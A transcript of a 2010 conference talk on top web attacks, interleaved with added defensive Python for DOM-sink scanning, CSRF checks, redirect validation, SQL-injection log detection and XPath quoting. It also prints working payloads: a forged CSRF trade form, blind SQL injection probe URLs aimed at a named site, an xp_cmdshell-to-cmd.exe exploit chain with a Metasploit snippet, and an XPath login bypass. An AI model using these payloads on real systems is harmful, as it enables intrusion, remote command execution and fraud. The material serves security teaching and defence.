Web Attacks - Top threats - 2010
Covering top web attacks ...

  • Speaker notes: the famous web application set-up diagram. Walk through each component and mention its role:
    • Web client – HTTP connections
    • Firewall – lets in only HTTP requests, and allows only outbound HTTP responses
    • Web server – handles all initial requests
    • Applications – run either on the web server, or on app servers
    • Database – SQL databases, and connection interfaces

    1. Session F3
       • Defending against the worst web-based application vulnerabilities of 2010
       • Date: Monday, 19 April 2010   Time: 3:45pm - 5pm
       • Shreeraj Shah
       • Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense
    2. Who Am I?
       • Founder & Director
         • Blueinfy Solutions Pvt. Ltd. (Brief)
         • SecurityExposure.com
       • Past experience
         • Net Square, Chase, IBM & Foundstone
       • Interest
         • Web security research
       • Published research
         • Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
         • Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
         • Advisories – .Net, Java servers etc.
       • Books (Author)
         • Web 2.0 Security – Defending Ajax, RIA and SOA
         • Hacking Web Services
         • Web Hacking
       http://shreeraj.blogspot.com   [email_address]   http://www.blueinfy.com
    3. 2010 - WEB ATTACKS
    4. Real Life Analysis and Cases
       • Accessing infrastructure through LDAP injection
       • Replicating a full financial database from one Blind SQL injection
       • Accessing another user's banking account through a logical business flaw
       • Client side control and hacking through CSRF and XSS
       • Results – Full control over web applications
    5. Technology Trends
       • Web 2.0 – Ajax, Silverlight and Flex/Flash
       • Web Services and SOA
       • Cloud APIs and SaaS
       • Browser empowering – HTML 5 and several other features
       • Traditional stacks are evolving around frameworks
    6. Past, Present and Future (diagram: Cloud, 2010 Focus)
    7. Major Overlap in Web Apps (diagram)
       • Presentation Layer, Business Layer, Utility Layer, Data Access, Authentication, Communication etc.
       • Runtime, Platform, Operating System
       • Components: Server side Components, Client side Components (Browser)
    8. Next Generation Apps
       • Site pageflakes.com (SaaS)
         • Web 2.0 Start page
         • Mashup for various applications
         • Using .NET and Ajax technologies
         • Can access mails, news etc. from the same page
         • Various Widgets and modules
    9. Next Generation Architecture (diagram)
       • Browser: HTML / JS / DOM, RIA (Flash), Ajax
       • Internet
       • Web 2.0 Start page: Blog, Database, Authentication, Application Infrastructure, Web Services End point
       • Internet: Mails, News, Documents, Weather, Bank/Trade, RSS feeds
    10. OWASP & WASC/TC
    11. Vulnerability distribution – WASC Stats.
    13. Client Side Vulnerabilities
       • V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.)
       • V2 - CSRF (XML)
       • V3 - Redirects and Forwards (Phishing and Trust break)
    14. V1 - Distributed DOM driven XSS (diagram: attacker → Web app / Web app proxy → Web Server / DB; Web Client (8008) receives an XML/JSON/JS-Object stream, passes it to eval() → XSS)
    15. DOM Exploit Points
       • document.write(…)
       • document.writeln(…)
       • document.body.innerHtml=…
       • document.forms[0].action=…
       • document.attachEvent(…)
       • document.create…(…)
       • document.execCommand(…)
       • document.body. …
       • window.attachEvent(…)
       • document.location=…
       • document.location.hostname=…
       • document.location.replace(…)
       • document.location.assign(…)
       • document.URL=…
       • window.navigate(…)
    16. Exploiting RSS feeds
       • RSS feeds consuming untrusted sources.
       • Feed readers are a common component.
       • Vulnerable to DOM driven XSS.
       • Malicious code injection and attacking the browser.
    17. Mashups Exploits
       • API exposure for Mashup applications.
       • Building applications with APIs
       • Cross Domain access by callback may cause a security breach.
       • Extensive DOM leverage – inject and exploit
    18. Widgets/Gadgets Exploits
       • DOM sharing model can cause many security issues.
       • One widget can change information on another widget – possible.
       • CSRF injection through widget code.
       • Event hijacking is possible – Common DOM
    19. Defense
       • Input validation and encoding
       • JavaScript – source code analysis
       • Widget – DOM sharing issue
       • Information validation and trusted source consumption
       • XSS protection and Cross Domain Blocking
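The "JavaScript – source code analysis" item on slide 19 is concrete enough to automate against the sink list on slide 15. The following is an added example written for this page, not code from the deck or from the author's tools: it scans JavaScript source line by line, flags any write to one of the slide-15 sinks (plus the eval() from slide 14), and raises the finding to "high" when the same statement also reads an attacker-influenced source. The source list and the sample widget code are my own constructed assumptions; the regular expressions are mine and the sink names are the deck's.

```python
"""Flag DOM exploit points (slide 15) in JavaScript source, as a first pass of
the source-code analysis slide 19 recommends. Added example, not the deck's."""
import re

# Sinks: the DOM exploit points from slide 15 plus eval() from slide 14.
# The regular expressions are mine; (?!=) keeps "==" comparisons from matching.
SINK_PATTERNS = [
    r"document\.write(?:ln)?\s*\(",
    r"\.innerHTML\s*=(?!=)",
    r"document\.forms\[\d+\]\.action\s*=(?!=)",
    r"(?:document|window)\.attachEvent\s*\(",
    r"document\.create\w+\s*\(",
    r"document\.execCommand\s*\(",
    r"(?:document|window)\.location(?:\.hostname)?\s*=(?!=)",
    r"(?:document\.)?location\.(?:replace|assign)\s*\(",
    r"document\.URL\s*=(?!=)",
    r"window\.navigate\s*\(",
    r"\beval\s*\(",
]
# Attacker-influenced sources (assumption: a short common list, not exhaustive).
SOURCE_PATTERNS = [
    r"location\.(?:hash|search|href)",
    r"document\.(?:URL|referrer|cookie)",
    r"window\.name",
    r"\bresponseText\b",          # XML/JSON stream body, as in the slide-14 diagram
]
SINK_RE = re.compile("|".join(SINK_PATTERNS), re.I)
SOURCE_RE = re.compile("|".join(SOURCE_PATTERNS), re.I)


def scan_js(source: str) -> list:
    """Return one finding per line that writes to a sink.

    severity is "high" when a source is read in the same statement (a likely
    DOM-driven XSS) and "review" when the sink is fed by something else."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        sink = SINK_RE.search(line)
        if not sink:
            continue
        tainted = SOURCE_RE.search(line) is not None
        findings.append({
            "line": lineno,
            "sink": sink.group(0).strip(),
            "severity": "high" if tainted else "review",
            "code": line.strip(),
        })
    return findings


def summarize(findings: list) -> dict:
    """Count findings per severity, e.g. {"high": 2, "review": 2}."""
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Constructed sample: a widget that greets the user from the URL fragment and
# eval()s a JSON feed, next to two sinks fed by constants.
SAMPLE_JS = """\
// constructed sample widget code
document.getElementById('greet').innerHTML = 'Hi ' + location.hash.substring(1);
var box = document.createElement('div');
if (document.location.hostname == 'example.com') { ok(); }
var feed = eval('(' + xhr.responseText + ')');
document.write('<b>static</b>');
"""

if __name__ == "__main__":
    for f in scan_js(SAMPLE_JS):
        print(f"line {f['line']:>3} [{f['severity']:>6}] {f['sink']:<22} {f['code']}")
    print(summarize(scan_js(SAMPLE_JS)))
```

Running the block on the sample reports the innerHTML and eval() lines as "high" and the createElement and document.write lines as "review"; the hostname comparison is not reported because it is a read, not a write. A line-local check like this misses a source read on one line and used on the next, which is exactly the gap a real data-flow pass in a code scanner closes.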
    20. V2 - Cross Site Request Forgery (CSRF)
       • Next Generation CSRF
         • Is it possible to do CSRF to an XML stream?
         • How?
         • It will be a POST hitting the XML processing resources like Web Services
         • JSON CSRF is also possible
         • Interesting check to make against application and Web 2.0 resources
    21.–25. One Way CSRF Scenario / One-Way CSRF (five diagram slides; only the titles are recoverable)
    26. One-Way CSRF
        <html>
        <body>
        <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
        <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' >
        </FORM>
        <script>document.buy.submit();</script>
        </body>
        </html>
    27. Forcing XML
       • Splitting the XML stream in the form.
       • Possible through XForms as well.
       • Similar techniques are applicable to JSON as well.
    28. Defense
       • Server Side Checks
         • Check for the client's content-type.
         • XHR calls – application/xml.
         • Native calls – text/html.
         • Filtering is possible on it.
       • Client Side Checks
         • Stream can be started and terminated by /* or any predefined characters.
         • Client can remove them before injecting into the DOM.
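Slide 28 lists two checks without showing them. The block below is an added example, not code from the deck: the server-side check admits only the content types an XHR client sends to the XML/JSON endpoint and requires a custom header that an HTML form (such as the auto-submitting form on slide 26, which arrives as text/plain) cannot add, and the client-side pair wraps the stream in the /* ... */ guard from the slide and strips it again before parsing. The header sets are constructed; the endpoint name is only a comment pointing back to slide 26.

```python
"""Server- and client-side CSRF checks from slide 28. Added example, not the
deck's code. Assumes an XML-RPC/JSON endpoint like the one targeted by the
slide-26 form (http://trade.example.com/xmlrpc/trade.rem)."""
import json

# Content types a legitimate XHR client sends to the XML/JSON endpoint.
XHR_CONTENT_TYPES = {"application/xml", "text/xml", "application/json"}
GUARD_PREFIX, GUARD_SUFFIX = "/*", "*/"


def accept_xhr_request(headers: dict) -> tuple:
    """Server-side check. Returns (accepted, reason)."""
    h = {k.lower(): v for k, v in headers.items()}          # header names are case-insensitive
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in XHR_CONTENT_TYPES:
        # an HTML form can only send urlencoded, multipart or text/plain bodies
        return False, f"unexpected content-type {ctype or '<none>'}"
    # a form cannot set custom headers, and a cross-site XHR cannot either
    # without a CORS preflight that this server never approves
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With header"
    return True, "ok"


def wrap_stream(obj) -> str:
    """Server side: emit the JSON inside the /* ... */ guard from slide 28."""
    return GUARD_PREFIX + json.dumps(obj) + GUARD_SUFFIX


def is_guarded(body: str) -> bool:
    return body.startswith(GUARD_PREFIX) and body.endswith(GUARD_SUFFIX)


def unwrap_stream(body: str):
    """Client side: refuse an unguarded stream, strip the guard, then parse.
    The guard makes the raw stream unusable if it is ever pulled in as a
    <script> source, so only the application's own XHR code can consume it."""
    if not is_guarded(body):
        raise ValueError("stream is not guarded; refusing to inject into DOM")
    return json.loads(body[len(GUARD_PREFIX):-len(GUARD_SUFFIX)])


# Constructed request headers: what the slide-26 form produces vs a real XHR.
FORM_CSRF_HEADERS = {"Content-Type": "text/plain", "Host": "trade.example.com"}
XHR_HEADERS = {"Content-Type": "application/xml; charset=utf-8",
               "X-Requested-With": "XMLHttpRequest"}

if __name__ == "__main__":
    print("forged form  :", accept_xhr_request(FORM_CSRF_HEADERS))
    print("real XHR     :", accept_xhr_request(XHR_HEADERS))
    guarded = wrap_stream({"symbol": "MSFT", "qty": 26})
    print("on the wire  :", guarded)
    print("after unwrap :", unwrap_stream(guarded))
```

These are the checks the slide names; in practice they sit beside a per-request anti-CSRF token, since a content-type check alone stops the form-based trick but not every cross-site request path.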
    29. V3 – Redirects and Forward issues
       • As a part of the root cause, there must be a redirect hole
       • Example:
         • http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx
       • Here "page" is a vulnerable parameter
       • What if someone puts page=http://yahoo.com …
    30. Attack Anatomy – Detection (diagram)
       • Attacker → foo.bank.com: http://foo.bank.com/login.aspx?user=xxx&page=http://yahoo.com
       • foo.bank.com → Attacker: a redirect or JavaScript call for loading yahoo.com. Vulnerability detected!!!
    31. Attack Anatomy – Threat, step 1 (diagram)
       • Link in mail; clicking the link gets a redirect response to 203.88.XX.XX
    32. Attack Anatomy – step 2 (diagram)
       • Bank's user clicks the link; foo.bank.com answers with a redirect to 203.88.XX.XX (attacker's area) – a trusted evil redirect
       • 203.88.XX.XX sends a dummy form to the bank's user
    33. Attack Anatomy – step 3 (diagram)
       • Bank's user sends username and password to 203.88.XX.XX
       • 203.88.XX.XX sends a dummy response (Thanks!)
    34. Attack Anatomy – step 4 (diagram)
       • Attacker logs in to foo.bank.com and does a money transfer
    35. Defense
       • Need to validate parameters before passing them to redirect calls on the server side
       • Filtering http:// or https://
       • Do not pass values to JavaScript redirects before filtering or validating
       • Deployment level redirects should not rely on HTTP parameters coming from the user
       • Checking the referrer on important forms
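The first two items on slide 35 (validate before redirecting, filter http:// and https://) are shown here as an added example written for this page, not code from the deck. It models the login.aspx?user=xxx&page=... case from slide 29: the page parameter is only accepted as a path inside the application's own origin, and anything carrying a scheme or a host, including the backslash and protocol-relative spellings that a plain "http://" filter misses, falls back to a default landing page. The last function is the referrer check from the slide's final item. The origin is the slide's foo.bank.com; the default landing page and the rejected sample inputs are my assumptions.

```python
"""Redirect-target validation for the slide-29 open redirect, per slide 35.
Added example, not the deck's code."""
from urllib.parse import urlsplit, urljoin

APP_ORIGIN = "https://foo.bank.com"        # host from slide 29
DEFAULT_LANDING = "/trade.aspx"            # assumption: where login normally lands
APP_HOST = urlsplit(APP_ORIGIN).netloc


def safe_redirect_target(page: str) -> str:
    """Return an absolute URL on APP_ORIGIN for a user-supplied `page`,
    or the default landing page when `page` is not an in-app path."""
    fallback = urljoin(APP_ORIGIN, DEFAULT_LANDING)
    if not page:
        return fallback
    # CR/LF or other control characters would let the value break out of the
    # Location header, so they are rejected outright
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in page):
        return fallback
    # browsers treat "\" like "/", so "/\evil.example" is protocol-relative;
    # normalise before parsing so the check below sees it
    candidate = page.replace("\\", "/")
    parts = urlsplit(candidate)
    # any scheme (http:, https:, javascript:, data:) or any host (//evil) is
    # an off-site redirect; this is the "filter http:// or https://" item done
    # structurally rather than by substring
    if parts.scheme or parts.netloc:
        return fallback
    path = candidate if candidate.startswith("/") else "/" + candidate
    if path.startswith("//"):
        return fallback
    return urljoin(APP_ORIGIN, path)       # dot-segments resolve within the origin


def referer_is_trusted(referer) -> bool:
    """Slide 35, last item: on an important form, require a Referer from our
    own host. A missing or foreign Referer fails closed."""
    if not referer:
        return False
    p = urlsplit(referer)
    return p.scheme in ("https", "http") and p.netloc.lower() == APP_HOST


if __name__ == "__main__":
    # constructed inputs: the slide's benign value, its probe, and some variants
    for value in ["trade.aspx", "http://yahoo.com", "//evil.example/login",
                  "/\\evil.example/x", "javascript:alert(1)",
                  "/account/summary.aspx?tab=2"]:
        print(f"{value!r:32} -> {safe_redirect_target(value)}")
```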
    37. Server Side Vulnerabilities
       • V4 - Advanced SQL injection (Blind/XML/JSON)
       • V5 – XPATH Injection
       • V6 – Reverse Engineering
       • V7 – Logical Attacks
       • V8 – WSDL discovery
       • V9 – SOAP faultcode leakage
       • V10 – SOAP injections
    38. V4 - Advanced SQL injections
       • SQL injection over JSON streams
       • Flash based points
       • XML data access layer exposure
       • Errors are not returned as standard 500 responses
       • The response is 200 and the messages are embedded in the stream
    39. Blind SQL Injection
       • We have an SQL injection point but it is not throwing any error message out as part of its response. The application is sending a customized error page which does not reveal any signature by which we can deduce a potential SQL flaw.
       • Knowing the SQL injection point or loophole in the web application, xp_cmdshell seems to be working. But we can't say whether it is working or not, since it doesn't return any meaningful signature. This is "blind xp_cmdshell".
       • The firewall doesn't allow outbound traffic, so we can't do ftp, tftp, ping etc. from the box to the Internet to confirm execution of the command on the target system.
       • We don't know the actual path to the webroot, so we can't copy a file to a location which can be accessed over HTTP or HTTPS later to confirm the execution of the command.
       • If we know the path to the webroot and the directory structure but can't find execute permission on it, we can't copy cmd.exe or any other binary and execute it over HTTP/HTTPS.
    40. Checks…
       • AND 1=1
       • DBO check
       • 'dbo'
       • Wait delay call
       • ;waitfor+delay+'0:0:10'
       • (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
       • http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
       • http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97
    41. Running tools
       • SQL Map or Absinthe
         D:\tools\sqlmap>sqlmap.py -b -u
         sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
         and belch <daniele.bellucci@gmail.com>
         [*] starting at: 18:47:58
         [18:48:00] [WARNING] the remote DMBS is not MySQL
         [18:48:00] [WARNING] the remote DMBS is not PostgreSQL
         remote DBMS: Microsoft SQL Server
         banner:
         ---
         Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
         Oct 14 2005 00:33:37
         Copyright (c) 1988-2005 Microsoft Corporation
         Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
         ---
         [*] shutting down at: 18:48:14
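Slides 38 to 40 make a point that matters for detection: a blind injection produces no 500 and no error text, so the only place the probes show up is the request line. The block below is an added example for this page, not part of the deck: it parses combined-format access log lines, URL-decodes the request target the way the server saw it, matches the three probe shapes from slide 40 (tautology, time delay, ASCII(SUBSTRING(...)) character extraction) plus the stacked xp_cmdshell call from slide 42, and counts hits per client, since one request is noise and a run of them at two-second intervals is an extraction loop. The log lines and client addresses are constructed; the payloads are the ones on slides 40 and 42.

```python
"""Spot the blind-SQL-injection probes from slides 40 and 42 in web access
logs. Added example, not the deck's code. Sample log lines are constructed."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One signature per probe shape shown on the slides; all match case-insensitively.
PROBE_SIGNATURES = {
    "tautology":    re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I),   # AND 1=1
    "time-delay":   re.compile(r"\bwaitfor\s+delay\b", re.I),               # ;waitfor delay '0:0:10'
    "char-extract": re.compile(r"ascii\s*\(\s*substring\s*\(", re.I),       # ASCII(SUBSTRING(...))=115
    "stacked-exec": re.compile(r";\s*exec\b|xp_cmdshell", re.I),            # ;exec master..xp_cmdshell
}

# Combined log format: client, identity, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target: str) -> list:
    """Return the probe names whose signature matches the decoded target."""
    decoded = unquote_plus(target)          # '+' and %xx as the server decoded them
    return [name for name, rx in PROBE_SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(lines) -> list:
    """One hit per log line whose request target matches a probe signature.
    The status code is kept but not used for matching: slide 38 notes these
    come back as 200, so a 5xx filter would miss every one of them."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "tags": tags})
    return hits


def per_client_counts(hits) -> Counter:
    """Probe count per client address; a high count is the extraction loop."""
    return Counter(h["ip"] for h in hits)


# Constructed sample log: one client walks through the slide-40 checks and then
# the slide-42 command; a second client sends an ordinary search.
SAMPLE_LOG = r"""
203.0.113.7 - - [19/Apr/2010:15:47:58 +0000] "GET /details.aspx?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [19/Apr/2010:15:48:00 +0000] "GET /details.aspx?id=1+AND+1=1 HTTP/1.1" 200 5120
203.0.113.7 - - [19/Apr/2010:15:48:02 +0000] "GET /details.aspx?id=1;waitfor+delay+'0:0:10' HTTP/1.1" 200 5120
203.0.113.7 - - [19/Apr/2010:15:48:14 +0000] "GET /details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 HTTP/1.1" 200 5120
198.51.100.5 - - [19/Apr/2010:15:48:15 +0000] "GET /search.aspx?q=and+how+to+trade HTTP/1.1" 200 2210
203.0.113.7 - - [19/Apr/2010:15:48:16 +0000] "GET /details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs' HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG.strip().splitlines())
    for h in hits:
        print(h["ts"], h["ip"], h["status"], ",".join(h["tags"]))
    print(per_client_counts(hits))
```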
    42. Exploiting
        Set WshShell = WScript.CreateObject("WScript.Shell")
        Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
        windir = ObjExec.StdOut.ReadLine()
        Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
        Set Dir = Root.Create("IIsWebVirtualDir", "secret")
        Dir.Path = windir
        Dir.AccessExecute = True
        Dir.SetInfo

        http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
        … ..
        … ..
        … ..
        http://target/details.asp?id=1;exec+master..xp_cmdshell+'echo ' Dir.SetInfo >> c:\secret.vbs'
        http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
    43. Get the cmd.exe
       • Run command over HTTP/HTTPS
       • http://target/secret/system32/cmd.exe?+/c+set
    44. Metasploit …
        sub Exploit {
            my $self = shift;
            my $target_host = $self->GetVar('RHOST');
            my $target_port = $self->GetVar('RPORT');
            my $path = $self->GetVar('RPATH');
            my $vhost = $self->GetVar('VHOST');
            my @url = split(/#/, $path);
            my @payload =
            ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+\"c:\\winnt\\system32\">>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:\\secret.vbs'",
             "EXEC+master..xp_cmdshell+'cscript+c:\\secret.vbs'"
            );
            $self->PrintLine("[+] Sending SQL injection payload...");
            for(my $count=0;$count<=6;$count++)
            ..
    45. V5 - XPATH injection
       • XPATH parsing standard error
       • XPATH is a method available for XML parsing
       • MS SQL server provides an interface and one can get table content in XML format.
       • Once this is fetched one can run XPATH queries and obtain results.
       • What if username/password parsing is done using XPATH – XPATH injection
    46. XPATH injection
        using System.Xml;
        using Microsoft.Data.SqlXml;   // SQLXML managed classes: SqlXmlCommand

        string fulltext = "";
        string coString =
            "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
        SqlXmlCommand co = new SqlXmlCommand(coString);
        co.RootTag = "Credential";
        co.CommandType = SqlXmlCommandType.Sql;
        co.CommandText = "SELECT * FROM users for xml Auto";
        XmlReader xr = co.ExecuteXmlReader();
        xr.MoveToContent();
        fulltext = xr.ReadOuterXml();
        XmlDocument doc = new XmlDocument();
        doc.LoadXml(fulltext);
        // user and pass are concatenated straight into the XPath expression
        string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
        XmlNodeList xmln = doc.SelectNodes(credential);
        if (xmln.Count > 0)
        {
            // True: a node matched, credentials accepted
        }
        else
        {
            // false
        }
    47. XPATH injection
       • string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
       • XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
       • This will always be true on the first node and the user gets access as whoever is the first user.
       • Bingo!
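The C# on slide 46 is the vulnerable form, and slide 47 shows why: the user value is dropped into the XPath string unquoted. XPath 1.0 has no bound parameters, so the fix is to emit the value as a literal that a quote in the input cannot terminate. The block below is an added example written for this page, not the deck's code: it builds the literal with whichever quote character the value does not contain, falls back to concat() when it contains both, and looks the user up by username alone before comparing the password in code, so the password never enters the expression at all. The XML document mirrors what the slide's FOR XML AUTO query returns (a Credential root with one users element per row); its rows and the lookup engine (the standard library's ElementTree subset of XPath) are my assumptions.

```python
"""Safe XPath literal construction for the slide-46/47 credential lookup.
Added example, not the deck's code."""
import hmac
import xml.etree.ElementTree as ET


def xpath_literal(value: str) -> str:
    """Quote `value` as an XPath 1.0 string literal so that no quote inside it
    can end the literal early."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    # both quote kinds present: concat('part', "'", 'part', ...)
    pieces = []
    parts = value.split("'")
    for i, part in enumerate(parts):
        if part:
            pieces.append(f"'{part}'")
        if i < len(parts) - 1:
            pieces.append('"\'"')
    return "concat(" + ", ".join(pieces) + ")"


def unsafe_credential_query(user: str, pw: str) -> str:
    """The deck's concatenation (slide 46), kept here only to show its output."""
    return "//users[@username='" + user + "' and @password='" + pw + "']"


def credential_query(user: str, pw: str) -> str:
    """Same query with both values quoted through xpath_literal()."""
    return f"//users[@username={xpath_literal(user)} and @password={xpath_literal(pw)}]"


def load_credentials(xml_text: str) -> ET.Element:
    return ET.fromstring(xml_text)


def authenticate(doc: ET.Element, user: str, pw: str) -> bool:
    """Look the user up by name only, then compare the password in code.
    ElementTree's XPath subset understands [@attr='v'] and [@attr="v"] but
    not concat(), so a name holding both quote kinds is simply refused."""
    if "'" in user and '"' in user:
        return False
    nodes = doc.findall(f"./users[@username={xpath_literal(user)}]")
    if len(nodes) != 1:
        return False
    stored = nodes[0].get("password", "")
    # constant-time comparison; real deployments store a password hash here
    return hmac.compare_digest(stored.encode(), pw.encode())


# Constructed document in the shape of the slide's "SELECT * FROM users FOR XML AUTO"
SAMPLE_XML = """<Credential>
  <users username="admin" password="s3cret"/>
  <users username="bob" password="hunter2"/>
</Credential>"""

if __name__ == "__main__":
    payload = "' or 1=1 or ''='"          # the slide-47 string
    print("unsafe:", unsafe_credential_query(payload, "x"))
    print("safe:  ", credential_query(payload, "x"))
    doc = load_credentials(SAMPLE_XML)
    print("bob/hunter2 ->", authenticate(doc, "bob", "hunter2"))
    print("payload/x   ->", authenticate(doc, payload, "x"))
```

With the slide-47 string the unsafe query becomes //users[@username='' or 1=1 or ''='' and @password='x'], which matches every node; the quoted form keeps the whole string inside one literal and matches nothing.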
    48. V6 - Reverse Engineering
       • It is possible to reverse engineer RIA apps
       • Attacking Flash and Silverlight components
       • Identifying hidden treasure and business logic
       • Crafting attacks based on enumerated information
    49. V7 - Logical Attack
       • Exploiting application layer weakness with logical issues
       • Accessing unauthorized information
       • Analyzing code – JavaScript analysis and logical errors
       • Several key areas can be exploited
       • Debugging and Reverse Engineering help a lot
    50. V8 - WSDL Discovery Attacks
       • Search in the public domain
       • Tool – Search Engines
       • Look for wsdl, asmx, jws etc.
       • Filetype and allinurl
    51. V9 - Fault code leakage with SOAP
       • Fault codes of web services spit out a lot of information about internal workings.
       • This attack can fetch internal paths, database interfaces etc.
       • The fault code is part of the SOAP envelope and this helps an attacker to make logical deductions about assets.
    52. V10 – SOAP injections (SQL)
       • SQL injection can be done using SOAP traffic.
       • It is an innovative way of identifying database interface points.
       • One can leverage xp_cmdshell via SOAP.
       • The back end database can be compromised using this attack.
    53. Defending
       • Input validation across streams – XML, JSON and Name-Value pairs
       • Do not put logic in client side components running in Flash and Silverlight
       • Extra attention and code review for logical attacks
       • WSDL and SOAP security around Web Services
    54. Key Controls
       • WAF for stream protection
       • Source Code Review during SDLC
       • Developers' knowledge base
       • Secure API and Library usage across the enterprise
       • Secure SDLC with various controls including threat modeling
       • Web 2.0 Attacks and Countermeasure strategies
    55. CONCLUSION – QUESTIONS!   [email_address]   http://www.blueinfy.com